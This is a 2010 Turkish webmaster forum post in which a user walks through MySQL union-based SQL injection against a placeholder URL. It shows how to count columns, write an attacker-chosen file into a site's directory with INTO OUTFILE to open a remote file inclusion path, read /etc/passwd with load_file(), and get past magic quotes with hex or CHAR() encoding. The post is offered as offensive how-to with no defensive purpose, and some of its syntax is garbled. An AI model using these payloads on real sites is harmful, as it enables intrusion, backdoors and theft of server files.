|
Webmaster Araçları Kutsal Webmaster Bilgi Kaynağı |
|
| Forum | Üye ol | Giriş Yap |
| Forum >> Güvenlik Açıkları ve ipuçları >> mysql injection:dosya oluşturmakdosya okumak |
| Yazan | |
| ahmet Yeni Üye  |  03 Temmuz 2010 Cumartesi 09:55:25 mysql injection olayında dosya oluşturmak çok basittir.hemen göstereyim. şimdi sitemiz burası olsun http://www.site.com/x.php?id=1 aldıgımız hatalara göre colomnları yazalım örnegin 5 colomn olsun http://www.site.com/x.php?id=-1 union select 1,2,3,4,5 aldıgımız hatada 3 olsun http://www.site.com/x.php?id=-1 union select 1,2,'buraya oluştracagimiz dosyanin kodu',4,5 INTO+OUFILE+'sitenin dizini/olusturacaginiz dosyanin adi'/* örnegin kendimize rfi yolu açabiliriz "buraya oluştracagimiz dosyanin kodu" yazan yere '' bsait bir sayfa çagırma kodu ile kendimize rfi yolu açabiliriz. Dosya okumak ise daha basit bir olay.load_file() fonksiyonu ile dosya okuyabilirsiniz. şöyleki union select 1,2,load_file(etc/passwd) komutu ile etc dizinindeki passwd dosyasını okuyabilirsiniz yada sizin istediginiz dosyayı... ama bazen magic qoutes buna karşı koyar onun içinde hexleyip başına 0x katarak olayı çözebilirsiinz.bazende hexlemek yetmez charlayip yapmaya gerek kaabilir o da şöyle oluyorki; LOAD_FILE(CHAR(charladiginz dizin)) gibi... |
Hemen üye olmak için burayı tıklayınız.. | |
| Sayfalar: 1 | |